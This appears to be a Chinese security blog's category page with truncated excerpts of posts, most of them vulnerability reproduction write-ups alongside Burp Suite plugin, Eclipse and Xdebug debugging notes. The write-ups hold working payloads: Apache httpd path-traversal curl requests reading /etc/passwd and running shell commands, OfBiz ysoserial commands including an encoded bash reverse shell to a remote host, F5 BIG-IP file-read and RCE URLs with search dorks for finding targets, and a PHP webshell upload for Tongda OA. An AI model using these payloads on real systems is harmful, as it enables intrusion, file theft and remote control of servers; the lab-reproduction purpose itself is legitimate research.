Classification:NetworkSec

Classification (NetworkSec)'s result:

apache httpd 2.4.49/2.4.50 目录穿越漏洞重现及分析

0x00 概述 20211005,网上曝出apache httpd 2.4.49的目录穿越漏洞(cve-2021-41773),可造成任意文件读取(穿越的目录允许被访问,比如配置了<Directory />Require all granted</Directory>默认不允许)或命令执行(rce需开启cgi,默认并不包含cgi 模块) 20211008,又出了2.4.50的目录穿越(cve-2021-42013),是绕过了cve-2021-41773的修复。   0x01 影响范围 cve-2021-41773: apache httpd 2.4.49 cve-2021-42013: apache httpd 2.4.50 //之前的版本不受影响。   0x02 漏洞重现 //rce的post方法改为get方法好像也行。 //payload要根据目标的apache路径层数变化跳出,一般4层够了。 //要有一个apache存在的目录,比如icons/或cgi-bin/ 先配置目录允许访问和开启cgi CVE-2021-41773 环境:https://github.com/blasty/CVE-2021-41773 or https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-41773/README.zh-cn.md 任意文件读取 curl -i -s –path-as-is “http://127.0.0.1:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd” 命令执行 开启了cgi curl -i -s –path-as-is -d ‘echo Content-Type: text/plain; echo; id’ “http://127.0.0.1:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh” CVE-2021-42013 环境: docker run -dit –name CVE-2021-42013 -p 8080:80 -v /opt/apache2.4.50:/usr/local/apache2/htdocs httpd:2.4.50 docker exec -it CVE-2021-42013 sed -i “0,/denied/s/AllowOverride none/# AllowOverride None/” conf/httpd.conf docker exec -it CVE-2021-42013 sed -i “0,/denied/s/denied/granted/” conf/httpd.conf docker stop CVE-2021-42013 docker start CVE-2021-42013 or https://hub.fastgit.org/vulhub/vulhub/tree/master/httpd/CVE-2021-42013 任意文件读取 curl -i http://127.0.0.1:8080/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd 命令执行 先开启cgi docker exec -it CVE-2021-42013 sed -i -E “s|all denied|all granted|g; s|#(.* cgid_.*)|\1|g” conf/httpd.conf 重启container curl -i -d ‘echo Content-Type: text/plain; echo; id’ “http://127.0.0.1:8080/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh” poc集合 cve-2021-41773 /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd cve-2021-42013 /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd /cgi-bin/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd /cgi-bin/.%2%65/.%2%65/.%2%65/.%2%65/etc/passwd 命令执行data格式: echo;id echo Content-Type: text/plain; echo; id A=|echo;id id>>/tmp/testid.txt //成功 “Host: 127.0.0.1\nUser-Agent: —`id`—\n” //不成功 500 curl -i -d ‘echo -e Host: 127.0.0.1\nUser-Agent: testrce\n’ “http://127.0.0.1:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh” //500   0x03 漏洞分析 直接用bin/httpd来对比 提取docker中的httpd docker cp mystifying_mayer:/usr/local/apache2/bin/httpd /home/lsc/ubuntu-sec-toolkit/misc/httpd/httpd-v2-4-50 1943 docker cp zen_hertz:/usr/local/apache2/bin/httpd /home/lsc/ubuntu-sec-toolkit/misc/httpd/httpd-v2-4-9 利用bindiff找差异  ……

apache ofbiz 两个反序列化漏洞重现(CVE-2021-26295和CVE-2020-9496)

0x00 概述 OFBiz是基于Java的Web框架,包括实体引擎,服务引擎和基于小部件的UI,是一个电子商务平台,用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。 CVE-2021-26295:RMI反序列化命令执行,未经身份验证的攻击者可以成功接管Apache OFBiz。 CVE-2020-9496:xmlrpc未授权反序列化导致RCE。   0x01 影响范围 CVE-2021-26295:Apache OFBiz < 17.12.06 CVE-2020-9496:Apache OFBiz < 17.12.04   0x02 漏洞重现 app=”Apache_OFBiz” CVE-2021-26295 docker run -d -p 8000:8080 -p 8443:8443  opensourceknight/ofbiz   POST /webtools/control/SOAPService HTTP/1.1 …… Content-Type: application/xml   <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/”> <soapenv:Header/> <soapenv:Body> <ser> <map-HashMap> <map-Entry> <map-Key> <cus-obj>ace……e78</cus-obj> </map-Key> <map-Value> <std-String value=”http://xxxxxx.dnslog.cn”/> </map-Value> </map-Entry> </map-HashMap> </ser> </soapenv:Body> </soapenv:Envelope> 中间的cus-obj 直接用: java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar URLDNS http://ofbiztest.xxxxxx.dnslog.cn > ofbizhex.out 然后转成hex 即可: import binascii filename = ‘ofbizhex.out’ with open(filename, ‘rb’) as f: content = f.read() print(binascii.hexlify(content))   RCE java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘curl http://192.168.56.200:7766/testofbizrce’ > b2h10.txt   POST /webtools/control/SOAPService HTTP/1.1 …… Content-Type: application/xml   <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ser=”http://ofbiz.apache.org/service/”> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj>aced00057……00678</cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>     反弹shell java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME ‘bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvNzc2NiA8JjEn}|{base64,-d}|{bash,-i}’ > b2h11.txt   POST /webtools/control/SOAPService HTTP/1.1 …… Content-Type: application/xml   <soapenv:Envelope xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ser=”http://ofbiz.apache.org/service/”> <soapenv:Header/> <soapenv:Body> <ser> <map-Map> <map-Entry> <map-Key> <cus-obj>aced00057……000678</cus-obj> </map-Key> <map-Value> <std-String/> </map-Value> </map-Entry> </map-Map> </ser> </soapenv:Body> </soapenv:Envelope>   CVE-2020-9496 环境:https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/ https://192.168.56.200:8443/myportal/control/main https://192.168.56.200:8443/webtools/control/xmlrpc   java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar CommonsBeanutils1 “touch /tmp/success”……

burpsuite插件开发总结

0x00 基础 burpsuite api: interface: 用java开发插件就把这个burp文件夹放到工程目录即可 javadoc 在线版 https://portswigger.net/burp/extender/api/index.html   官方教程: https://portswigger.net/burp/extender/ https://portswigger.net/blog/writing-your-first-burp-suite-extension https://portswigger.net/blog/archive?y=2012_12_01_archive.html   推荐用 Java,执行效率高,不会出现奇奇怪怪的问题…… //图片来源于网络 插件入口和帮助接口类: IBurpExtender、IBurpExtenderCallbacks、IExtensionHelpers、IExtensionStateListener IBurpExtender接口类是Burp插件的入口,所有Burp的插件均需要实现此接口,并且类命名为BurpExtender。 IBurpExtenderCallbacks接口类是IBurpExtender接口的实现类与Burp其他各个组件(Scanner、Intruder、Spider……)、各个通信对象(HttpRequestResponse、HttpService、SessionHandlingAction)之间的纽带。 IExtensionHelpers、IExtensionStateListener这两个接口类是插件的帮助和管理操作的接口定义。   UI相关接口类: IContextMenuFactory、IContextMenuInvocation、ITab、ITextEditor、IMessageEditor、IMenuItemHandler 这类接口类主要是定义Burp插件的UI显示和动作的处理事件,主要是软件交互中使用。   Burp工具组件接口类: IInterceptedProxyMessage、IIntruderAttack、IIntruderPayloadGenerator、IIntruderPayloadGeneratorFactory、IIntruderPayloadProcessor、IProxyListener、IScanIssue、IScannerCheck、IScannerInsertionPoint、IScannerInsertionPointProvider、IScannerListener、IScanQueueItem、IScopeChangeListener 这些接口类的功能非常好理解,Burp在接口定义的命名中使用了的见名知意的规范,看到接口类的名称,基本就能猜测出来这个接口是适用于哪个工具组件。   HTTP消息处理接口类: ICookie、IHttpListener、IHttpRequestResponse、IHttpRequestResponsePersisted、IHttpRequestResponseWithMarkers、IHttpService、IRequestInfo、IParameter、IResponseInfo 这些接口的定义主要是围绕HTTP消息通信过程中涉及的Cookie、Request、Response、Parameter几大消息对象,通过对通信消息头、消息体的数据处理,来达到控制HTTP消息传递的目的。 —https://t0data.gitbooks.io/burpsuite/content/chapter16.html   0x01 常用的接口和方法 public interface IBurpExtender void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) demo: public class BurpExtender implements IBurpExtender, ITab, IContextMenuFactory, ActionListener{ public void registerExtenderCallbacks(IBurpExtenderCallbacks callbacks) { callbacks.setExtensionName(“burp-info-extractor”); this.hps = callbacks.getHelpers(); this.cbs = callbacks; callbacks.registerContextMenuFactory(this);   public interface IBurpExtenderCallbacks demo: callbacks.setExtensionName(“burp-info-extractor”); callbacks.registerContextMenuFactory(this);   public interface IExtensionHelpers IRequestInfo analyzeRequest(IHttpRequestResponse request); IResponseInfo analyzeResponse(byte[] response); demo: reqHeaders = self._helpers.analyzeRequest(requestResponse).getHeaders()   public interface IScannerCheck List<IScanIssue> doPassiveScan(IHttpRequestResponse baseRequestResponse); demo: def doPassiveScan(self, baseRequestResponse): islaunchBurpUnauthChecker = int(self.launchBurpUnauthCheckerCheckBox.isSelected()) if (not islaunchBurpUnauthChecker) or (self.isFilterSuffix(baseRequestResponse)) or (self.isFilterStatusCode(baseRequestResponse)): return scan_issues = [] newRequestResponse = self.sendUnauthenticatedRequest(baseRequestResponse) #print str(self._helpers.analyzeRequest(baseRequestResponse).getUrl()) + ‘\n’ issue = self.compareResponses(newRequestResponse, baseRequestResponse) scan_issues.append(issue) return scan_issues def consolidateDuplicateIssues(self, isb, isa): return -1   public interface IHttpListener void processHttpMessage(int toolFlag, boolean messageIsRequest, IHttpRequestResponse messageInfo);   toolFlag在public interface IBurpExtenderCallbacks中可查看 /** * Flag used to identify Burp Suite as a whole. */ int TOOL_SUITE = 0x00000001; /** * Flag used to identify……

burpsuite使用技巧

1.限制目标scope   2.流量筛选 还有site map – 选中目标 – 右键 – add to scope / intercept – 右键 – don’t intercept this request – to this host   3.快捷键   4.解决中文乱码 选中文字体+选网页编码   5.intruder匹配中文 正则匹配 – 中文转换成十六进制   6.token刷新 录制宏   7.设置代理链   8.设置证书 or or

F5 BIG-IP TMUI RCE漏洞(CVE-2020-5902)重现及注意点

//本文首发先知社区:https://xz.aliyun.com/t/8007 0x00 概述 20200706,网上曝出F5 BIG-IP TMUI RCE漏洞。 F5 BIG-IP的TMUI组件(流量管理用户界面)存在认证绕过漏洞,该漏洞在于Tomcat解析的URL与request.getPathInfo()存在差异,导致可绕过权限验证,未授权访问TMUI模块所有功能,进而可以读取/写入任意文件,命令执行等。   0x01 影响范围 BIG-IP 15.x: 15.1.0/15.0.0 BIG-IP 14.x: 14.1.0 ~ 14.1.2 BIG-IP 13.x: 13.1.0 ~ 13.1.3 BIG-IP 12.x: 12.1.0 ~ 12.1.5 BIG-IP 11.x: 11.6.1 ~ 11.6.5 搜索关键词: shodan http.favicon.hash:-335242539 http.title:”BIG-IP&reg;- Redirect” fofa title=”BIG-IP&reg;- Redirect” tmui censys 443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5 443.https.get.title:”BIG-IP&reg;- Redirect” google inurl:”tmui/login.jsp” intitle:”BIG-IP” inurl:”tmu   0x02 漏洞重现 TMUI网站目录:/usr/local/www/tmui/ TMUI web server:Tomcat 0. 使用POC检测 https://1.2.3.4/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=test5902 https://1.2.3.4/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp 1. 任意文件读取 https://1.2.3.4/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd 2. 任意文件写入 https://1.2.3.4/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp         3. 列认证用户 https://1.2.3.4/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user   4. 列目录 https://1.2.3.4/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath=/usr/local/www/ 据David Vieira-Kurz(@secalert)说/tmp/下的sess_xxxxxxxxx文件可以替换cookie登录,但是试了几个都失败,可能是过期了……   5. RCE 1)tmshCmd.jsp?command=create+cli+alias+private+list+command+bash 2)fileSave.jsp?fileName=/tmp/cmd&content=id 3)tmshCmd.jsp?command=list+/tmp/cmd 4)tmshCmd.jsp?command=delete+cli+alias+private+list 多发送几次就能rce,基本都是root 记得还原   0x03 有缺陷的缓解方案1 1) 登录TMOS Shell(tmsh): tmsh 2) 编辑httpd组件配置文件 edit /sys httpd all-properties 3) 添加include代码 include ‘ <LocationMatch “.*\.\.;.*”> Redirect 404 / </LocationMatch> ‘ 4) 保存配置文件 ESC 并:wq 5) 保存系统配置 save /sys config 6) 重启httpd服务 restart sys service httpd   0x04 缓解方案绕过1 有缺陷的缓解方案正则限制了..; 但是/hsqldb这个接口加上;(分号)就可以绕过登录认证,进而反序列化,导致RCE 接着利用工具进行反序列化rce https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902 挺鸡肋的,需要知道hsqldb密码,默认空 试过了几个都是socket creation error……   0x05 有缺陷的缓解方案2 include ‘ <LocationMatch “;”> Redirect 404 / </LocationMatch> ‘   0x06 缓解方案绕过2 虽然直接限制分号,但是可以用/hsqldb%0a绕过认证   0x07 防御方案 Command line tmsh edit /sys httpd all-properties Locate the line……

通达(tongda)OA文件上传和文件包含漏洞重现及分析

0x00 概述 20200317,网上爆出通达oa被利用0day中勒索病毒的消息,官方已出漏洞补丁。 该0day为利用文件上传和文件包含组合利用进行RCE,无须认证。   0x01 影响范围 2013,2013增强版,2015,2016,2017,v11 //补丁只看见v11(2020)有geteway.php(文件包含漏洞)补丁   0x02 漏洞重现 利用v11版本: 文件包含漏洞 http://localhost/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log   文件上传漏洞 上传文件路径在非webroot目录,如: “D:\MYOA\attach\im\2003\ddd.test.jpg” 请求数据包: POST /ispirit/im/upload.php HTTP/1.1 Host: 127.0.0.1 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.20.0 Content-Length: 633 Content-Type: multipart/form-data; boundary=ee65cd98fdbee896acd30a7b2552b6b5 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”P” x –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”UPLOAD_MODE” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”DEST_UID” 1 –ee65cd98fdbee896acd30a7b2552b6b5 Content-Disposition: form-data; name=”ATTACHMENT”; filename=”test07.jpg” Content-Type: image/jpeg <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> –ee65cd98fdbee896acd30a7b2552b6b5– 再利用文件包含执行php代码 json=%7B%22url%22%3A%22%2Fgeneral%2F..%2F..%2Fattach%2Fim%2F2003%2F1941158481.test07.jpg%22%7D&cmd=whoami 或者这样包含也行 http://127.0.0.1/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../attach/im/2003/1044529275.test09.jpg //实测无法直接执行phpinfo(); 利用windows的com组件绕过disable_function() <?php $command=$_POST[‘cmd’]; $wsh = new COM(‘WScript.shell’); $exec = $wsh->exec(“cmd /c “.$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?>   0x03 修复方案 打补丁   0x04 漏洞分析 PHP Zend 5.4解密php文件即可 文件上传漏洞分析 upload.php:5 $P = $_POST[‘P’]; if (isset($P) || $P != ”) { ob_start(); include_once ‘inc/session.php’; session_id($P); session_start(); session_write_close(); } else { include_once ‘./auth.php’; } 要有P参数否则会经过auth.php登录验证,不为空即可。 $DEST_UID = $_POST[‘DEST_UID’]; $dataBack = array(); if ($DEST_UID != ” && !td_verify_ids($ids)) { $dataBack = array(‘status’ => 0, ‘content’ => ‘-ERR ‘ . _(‘½ÓÊÕ·½IDÎÞЧ’)); echo json_encode(data2utf8($dataBack)); exit;……

Tomcat AJP 文件读取/包含漏洞(CVE-2020-1938 )重现及分析

0x00 概述 202002,网上曝出tomcat ajp的文件读取/包含漏洞。 Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。 —https://www.chaitin.cn/zh/ghostcat   0x01 影响范围 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 0x02 漏洞重现 1】 xray   去掉.100的注释,攻击也失败。   2】 Python版 https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi 文件读取 文件包含 //修改源码,加上jsp后缀即可文件包含 #!/usr/bin/env python #CNVD-2020-10487 Tomcat-Ajp lfi #by ydhcui import struct   # Some references: # https://tomcat.apache.org/connectors-doc/ajp/ajpv13a.html def pack_string(s): if s is None: return struct.pack(“>h”, -1) l = len(s) return struct.pack(“>H%dsb” % l, l, s.encode(‘utf8’), 0) def unpack(stream, fmt): size = struct.calcsize(fmt) buf = stream.read(size) return struct.unpack(fmt, buf) def unpack_string(stream): size, = unpack(stream, “>h”) if size == -1: # null string return None res, = unpack(stream, “%ds” % size) stream.read(1) # \0 return res class NotFoundException(Exception): pass class AjpBodyRequest(object): # server == web server, container == servlet SERVER_TO_CONTAINER, CONTAINER_TO_SERVER = range(2) MAX_REQUEST_LENGTH = 8186 def __init__(self, data_stream, data_len, data_direction=None): self.data_stream = data_stream self.data_len = data_len self.data_direction = data_direction def serialize(self): data = self.data_stream.read(AjpBodyRequest.MAX_REQUEST_LENGTH) if len(data) ==……

eclipse调试java

本地调试: 双击左键下断点 远程调试: 本地:kali+eclipse 2019 12Eclipse IDE for Enterprise Java Developers. 远程:win7+tomcat7099 catalina.bat jpda start 修改 if not “%JPDA_ADDRESS%” == “” goto gotJpdaAddress set JPDA_ADDRESS=0.0.0.0:8000 如果只是本地那0.0.0.0就是localhost即可,否则会connection refused 注意调试tomcat要配置好src/java /* 不能同时多个连接,如果connection refused就disconnect一个 修改配置的方法 1、Linux中配置tomcat在catalina.sh中添加如下 CATALINA_OPTS=”-Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=n”(不要换行,要在同一行) 2、Window中修改 catalina,bat文件,添加: Set “CATALINA_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=n” 或者startup.bat开头加上 Set  “CATALINA_OPTS=-Xdebug  -Xrunjdwp:transport=dt_socket,address=8000,server=y,suspend=n” */ Eclipse 运行tomcat //创建新服务器勾选,选择tomcat目录 运行项目   MISC eclipse切换jdk   切换整个eclipse环境的版本 JDK和JRE要切换一致 Window-> Preferences—>Java—>Compiler Window-> Preferences—>Java—>Installed JREs   切换某个项目的java版本 版本保持一致 项目->Properties->Java Build Path-> Libraries->双击当前JDK->在弹出的界面中选择要切换的版本 项目->Properties-> Java Compiler->右侧面板设置为需要的版本 //项目->Properties-> Project Facets->右侧面板勾上Java,Version设为需要的版本   //Java Build Path中引用的jdk的版本需要和’Project Facets’中配置的java版本一致。 //Run Configurations面板中的JRE配置也需要和’Project Facets’中配置的java版本一致。   导入java自带类库 一些项目提示缺少类,但是java自带,可以直接导入java的jar类库即可  

smbghost(CVE-2020-0796)漏洞POC汇总及简单分析

//首发先知社区:https://xz.aliyun.com/t/7440   0x00 概述 20200310,microsoft透露了一个smb v3协议漏洞。 20200312,microsoft出补丁。 漏洞命名:smbghost/deepblue…… Microsoft Server Message Block 3.1.1(SMBv3)协议处理某些请求的方式中存在远程执行代码漏洞,可以在目标smb服务器或客户端上执行代码。 为了利用针对服务器的漏洞,未经身份验证的攻击者可以将特制数据包发送到目标SMBv3服务器;若要利用针对客户端的漏洞,未经身份验证的攻击者将需要配置恶意的SMBv3服务器,并诱使用户连接到该服务器。   0x01 影响范围 Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core installation) Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for x64-based Systems Windows 10 Version 1909 for ARM64-based Systems Windows Server, Version 1909 (Server Core installation) 只影响 SMB v3.1.1,1903和1909   0x02 漏洞检测 //至发文(20200322)暂未发现公开EXP。 环境win10x64-1903专业版,关闭防火墙,关闭自动更新! python版 https://github.com/ollypwn/SMBGhost It checks for SMB dialect 3.1.1 and compression capability through a negotiate request. —README.md socket发送数据包 pkt = b’\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02″\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00′ 返回判断 if res[68:70] != b”\x11\x03″ or res[70:72] != b”\x02\x00″: print(f”{ip} Not vulnerable.”) else: print(f”{ip} Vulnerable”) 然而打上补丁修补后: 所以打上补丁后该脚本也会返回vulnerable导致误报。 python版带数据结构输出 https://github.com/ioncodes/SMBGhost 此脚本判断是否已启用SMBv3.1.1和SMB压缩,同1)也会误报 pip3 install hexdump 同样也是判断这两个位置 version = struct.unpack(“H”, response[68:70])[0] context = struct.unpack(“H”, response[70:72])[0] if version != 0x0311: print(f”SMB version {hex(version)} was found which is not vulnerable!”) elif context != 2: print(f”Server answered with context {hex(context)} which indicates that the target may not have SMB compression enabled and is therefore……

kali+phpstorm+xdebug+firefox配置本地/远程调试

本地调试: 本地环境:kali(192.168.12.35)+phpstorm2019.1.3+xdebug+firefox 1)安装配置xdebug: 根据phpinfo下载xdebug https://xdebug.org/wizard 1. Download xdebug-2.9.2.tgz 2. Install the pre-requisites for compiling PHP extensions. On your Debian system, install them with: apt-get install php-dev autoconf automake 3. Unpack the downloaded file with tar -xvzf xdebug-2.9.2.tgz 4. Run: cd xdebug-2.9.2 5. Run: phpize (See the FAQ if you don’t have phpize). As part of its output it should show: Configuring for: … Zend Module Api No: xxxxxxxx Zend Extension Api No: xxxxxxxxx If it does not, you are using the wrong phpize. Please follow this FAQ entry and skip the next step. 11.Run: ./configure 12.Run: make 13.Run: cp modules/xdebug.so /usr/lib/php/xxxxxxxx 14.Update /etc/php/7.x/apache2/php.ini and change the line zend_extension = /usr/lib/php/xxxxxxxx/xdebug.so Make sure that zend_extension = /usr/lib/php/xxxxxxxx/xdebug.so is below the line for OPcache. 15.Restart the webserver php.ini: 末尾 [XDebug] zend_extension = /usr/lib/php/xxxxxxxx/xdebug.so   ; Debug Config xdebug.remote_enable = 1 xdebug.remote_handler = “dbgp” xxdebug.remote_mode = “req” xdebug.remote_host = “127.0.0.1” xdebug.remote_port = 9010 xdebug.remote_log = “/var/log/php-fpm/xdebug.log” xdebug.remote_autostart = off   xdebug.idekey = “PHPSTORM”   ; Profiler Config xdebug.profiler_append = 0 xdebug.profiler_enable = 1……